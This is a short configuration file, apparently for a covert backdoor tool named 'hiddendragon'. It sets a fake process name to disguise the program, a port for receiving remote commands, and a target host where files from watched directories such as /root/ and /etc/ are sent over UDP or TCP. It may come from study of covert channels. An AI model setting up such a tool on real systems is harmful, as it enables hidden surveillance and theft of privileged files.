# User config
mask_name = "/sbin/rgnd -f"	# name to mask process as.
daemon_mode = false 		# true or false; true- runs as daemon.
listen_port = 8080			# any int; listening port for commands
protocol = "UDP" 			# TCP, UDP; transport protocol used
target_port = 7000			# any target int; destination port of file transfer
src_host = "192.168.0.1"	# Valid src host; src IP address when sending files
target_host = "192.168.0.2"	# Valid target host; send files here
file_list = [				# list of directories to monitor
	"/root/",
	"/root/hiddendragon/",
	"/etc/"
]


#target_file = "/home/"	#depricated
